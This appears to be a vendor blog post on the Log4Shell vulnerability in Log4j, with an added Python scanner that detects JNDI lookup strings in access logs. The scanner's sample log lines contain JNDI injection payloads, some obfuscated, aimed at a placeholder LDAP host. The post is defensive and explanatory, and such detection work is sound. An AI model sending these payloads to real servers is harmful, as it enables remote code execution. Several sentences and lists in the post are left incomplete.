How the Log4j Attack Created a Worldwide Logjam—and What Happens Now

Get an overview of the Log4j vulnerability and learn what you should do next.

At the end of 2021 a vulnerability was discovered in Log4j, a Java-based logging library that large organizations, including some of the world’s biggest tech firms, use to record activity in their applications. It wreaked havoc on the internet on a global scale, and hackers were actively attempting to exploit the vulnerability by the minute.

“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), said on a phone call shared with CNN at the time.

In this blog, we’ll break down how it started, what the impact was, and what happens (or should happen) next.

The Inception: What is Log4j?

Log4j is a Java logging library that records messages about activity in an application or on a device. The library can produce simple logs, and it can also evaluate embedded lookup expressions to build advanced logging and integrate with other components.

Log4j is widely used across consumer and enterprise systems, in everything from iCloud, Steam and Minecraft, to Fortinet, IBM, Microsoft, Red Hat, Salesforce, Siemens, and other major enterprises.

What is the Log4j vulnerability?

Known as Log4Shell, it is a remote code execution (RCE) vulnerability that, if left unmitigated, enables a malicious threat actor to execute arbitrary Java code and take control of a target server. The troubling part is that it is easy to exploit and doesn’t require authentication.

And it gets worse.

The vulnerability can allow malicious actors to run software or plant backdoors on affected systems in order to maintain persistent, ongoing access.

Timeline of Events:

The Impact:

Log4j is a ubiquitous Java logging library: it can be found in nearly everything that is written in Java or that depends on Java software. Some recognizable platforms impacted include Apple, Amazon, Google, Cloudflare, Twitter, and Minecraft.

Exploitation is simple and does not require authentication. For example, a bad actor

How Does It Work Exactly?

  1. A bad actor injects a malicious payload via user-supplied input, for example an HTTP header or another field that the application logs with Log4j.
  2. The application receives the request and logs the input.
  3. The Log4j library processes the log entry, interprets the lookup expression contained in the logged input, and connects to a malicious LDAP server that the bad actor controls.
  4. The malicious LDAP server responds and instructs the application to download a malicious class file.
  5. The application downloads and executes the malicious Java class file.
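The detection side of steps 1 to 3, as an added example that is not part of the original post or of any Trava product: a small Python scanner that normalises nested lookup expressions (the `${lower:...}`, `${upper:...}` and `${...:-default}` forms used to disguise the string) and flags log lines whose logged input contains a JNDI lookup. The log lines, addresses and hostnames are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not real traffic). The last field is the
# logged User-Agent header, i.e. the user-supplied input from step 1.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:01:09 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/b}"',
    '10.0.0.3 - - [10/Dec/2021:10:01:11 +0000] "GET /img HTTP/1.1" 200 88 "-" "${date:yyyy}"',
]

# An innermost lookup: "${...}" with no further "${" nested inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once all disguising wrappers have been reduced.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(expr: str) -> str:
    """Reduce one innermost lookup the way Log4j's case and default-value
    lookups would, so obfuscated forms collapse to plain text. Only the
    lookups needed for normalisation are modelled; others stay literal."""
    key, _, value = expr.partition(":")
    if key.lower() == "lower":
        return value.lower()
    if key.lower() == "upper":
        return value.upper()
    if ":-" in expr:                      # ${name:-default} / ${::-j} style
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"              # unknown lookup: keep as written


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly reduce innermost lookups until nothing more resolves."""
    for _ in range(max_rounds):
        reduced = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if reduced == text:
            break
        text = reduced
    return text


def scan_log_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a line whose logged input carries a JNDI lookup."""
    if "${" not in line:                  # fast path: no lookup syntax at all
        return None
    normalized = normalize_lookups(line)
    if not _JNDI.search(normalized):
        return None
    return {"source": line.split(" ", 1)[0], "normalized": normalized, "raw": line}


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    return [hit for hit in (scan_log_line(line) for line in lines) if hit]
```

The benign `${date:yyyy}` line is left alone, so matching on `${jndi:` after normalisation rather than on `${` alone keeps the false-positive rate down.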

The Aftermath:

We may not be hearing as much about it in the news, but organizations are still struggling to identify and patch affected systems because of how pervasive the Log4j library is. Many organizations remain unpatched because of the complexity of updating software across multiple interdependent systems at once. Others are delaying patching on the grounds that their affected systems are not directly exposed to the Internet. However, those systems can still be reached by other means, and once compromised they pose as big a threat as public-facing systems.

The vulnerability is estimated to impact hundreds of organizations and thousands of systems. That number continues to rise as researchers, and criminals, continue to scan the Internet for affected systems.

How Can Trava Help?

Trava’s comprehensive risk assessment platform can help in several areas:

Download Trava's Complete Guide to Vulnerability Scan types that details

Then schedule a demo to see Trava's vulnerability risk assessment tool in action.
